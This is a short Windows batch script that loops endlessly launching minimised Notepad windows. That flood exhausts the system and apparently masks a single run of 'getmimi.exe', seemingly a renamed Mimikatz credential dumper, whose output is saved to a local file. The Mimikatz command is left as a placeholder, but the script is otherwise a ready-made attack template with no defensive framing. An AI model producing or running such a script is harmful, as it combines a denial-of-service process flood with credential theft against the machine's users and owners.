@echo off
set /a "x=0"
:loop
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	if %x%==0 (
		set /a "x=x+1"
		getmimi.exe "[insert mimikatz command here]" exit > C:\output\output.txt
	)
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	start /min notepad.exe
	goto :loop
